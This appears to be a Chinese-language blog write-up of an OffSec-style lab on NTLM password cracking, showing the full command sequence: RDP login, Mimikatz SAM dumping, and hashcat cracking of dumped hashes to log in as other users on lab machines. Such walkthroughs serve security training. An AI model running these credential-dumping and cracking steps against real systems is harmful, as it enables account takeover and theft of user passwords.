NTLM 密碼破解

 NTLM 密碼破解


Windows 將使用者密碼雜湊儲存在安全帳戶管理員 SAM 資料庫檔案中

核心對該檔案保持獨佔檔案系統鎖定

路徑位於 C:\Windows\system32\config\sam




靶機 IP : 192.168.197.210,獲取 nelly 用戶桌面上的 Flag

已知一般使用者帳號密碼 : offsec / lab


第一步 xfreerdp 登入遠端主機並掛載磁碟機

└─$ xfreerdp -v:192.168.197.210 -u:offsec -p:lab -drive:aries,/home/kali_r/Templates

登入後先查看 local 使用者,使用指令 Get-LocalUser
下圖有列出來題目要我們查找的 nelly 使用者,後續就是直接破解該帳號密碼



透過管理員身份啟動 PowerShell,然後啟動 Mimikatz




開始提取密碼,分別輸入以下指令 (每個指令由一個模組和兩個冒號分隔的指令組成)

 - privilege::debug

 - token::elevate

 - lsadump::sam




下面可以看到我們想要的使用者 nelly 的 hash 了,主要要的是這一段

Hash NTLM: 3ae8e5f0ffabb3a627672e1600f1ba10




先建立一個檔案 nelly.hash 並將 HASH 內容貼上




透過指令 └─$ hashcat --help | grep -i "ntlm" 查一下 NTLM 的 mode,是 1000



直接 hashcat 下去破解密碼吧,帶入 rockyou.txt 與 best64 規則來變異密碼表

└─$ hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

答案很快就出來了是 nicole1



RDP 進去看看 └─$ xfreerdp -v:192.168.197.210 -u:nelly -p:nicole1

登入後拿到目標 Flag 了




靶機 2 : 192.168.197.227

已知使用者 nadine 與密碼 123abc,獲取使用者 steve 的密碼明文


一樣 RDP 登入後開啟 Mimikatz 獲取 steve 的 HASH 如下

Hash NTLM: 2835573fb334e3696ef62a00e5cf7571





hashcat 下去 └─$ hashcat -m 1000 steve.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

馬上獲得密碼 francesca77





留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)